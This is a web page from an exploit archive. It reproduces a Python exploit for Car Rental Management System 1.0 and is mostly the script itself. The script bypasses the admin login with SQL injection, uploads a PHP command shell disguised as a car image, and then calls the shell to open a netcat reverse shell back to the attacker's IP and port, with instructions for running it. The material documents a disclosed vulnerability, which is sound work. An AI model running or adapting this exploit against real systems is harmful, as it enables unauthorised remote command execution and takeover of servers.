Registercar rental management system 1.0 sql injection + arbitrary file upload
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload # Date: 09-11-2020 # Exploit Author: Fortunato Lodari [fox at thebrain dot net] # Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Debian 10 with apache2 # This script will perform an automatic login using sql injection "'OR 1 = 1 limit 1 #" and will create a new car # in the archive, assigning a PHP file instead of the image of the car itself. This car, having "AAAAAAAAAAA" # as a brand, will be the first among those displayed and we will use the file just uploaded with a phpshell # on the victim system # # on the Attacker machine you must listen with NC on a port import sys import requests import time import random import http.cookiejar import os.path from os import path #foxlox# payload = {"username":"' OR 1=1 limit 1#","password":"moana"} proxies = { "http": "http://localhost:8080"} #payload = "username=' OR 1=1 limit 1 #&password=ciao" def deb(str): print("Debug => "+str) def login(): deb("Login...") session=requests.Session() url = mainurl+"/admin/ajax.php?action=login" #{'user-agent':'cagnolo','Referer':'http://192.168.0.130/car_rental/admin/login.php'} r=session.post(url,payload, allow_redirects=False,proxies=proxies) cookie = r.headers["Set-Cookie"] deb(cookie) return cookie def find_all(a_str, sub,lbegin,lend): start = 0 start = a_str.find(sub, start) t=(a_str[start+lbegin:start+lend]).replace('"','') return t def upload(c): deb("Getting cookie") c = c.split("=");cookie={c[0]:c[1]} deb("Sending payload") filetosend=files = {'img': ('s_hell.php', '<?php\necho system($_GET["cmd"]);\n?>\n')} fields={"id":"", "brand":"aaaAAAAAAAAAAAAAA", "model":"model", "category_id":"3", "engine_id":"1", "transmission_id":"2", "description":"description", "price":"0", "qty":"0", "img":""} r=requests.post(mainurl+'/admin/ajax.php?action=save_car',fields,cookies=cookie,allow_redirects=False,files=filetosend) deb("Saved Machine"); r=requests.get(mainurl+'/admin/index.php?page=cars', cookies=cookie,allow_redirects=False) mid=find_all(r.content,'data-id=',8,11) deb("Machine id: "+mid) r=requests.get(mainurl+'/admin/index.php?page=manage_car&id='+mid, cookies=cookie,allow_redirects=False) defurl=(find_all(r.content,"assets/uploads/cars_img",0,45)) deb("Exploit url: "+defurl) #os.system("firefox "+mainurl+"/admin/"+defurl+"?cmd=id") exploit = "wget '"+mainurl+"/admin/"+defurl+'?cmd=nc '+sys.argv[2]+" "+sys.argv[3]+" -e /bin/bash' -O /dev/null" print("Opening url: "+exploit) print("Don't forget to run: nc -nvlp "+sys.argv[3]) os.system(exploit) def usage(): if len(sys.argv) < 4: print("Create a PHPShell for Car Rental Management System") print("example:") print("python exploit_CMS_Car_management_system.py URL_BASE YOURIP YOURPORT") exit() usage() mainurl = sys.argv[1] upload(login()) #fox
Car rental management system 1.0 sql injection + arbitrary file upload Vulnerability / Exploit Source : Car rental management system 1.0 sql injection + arbitrary file upload
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes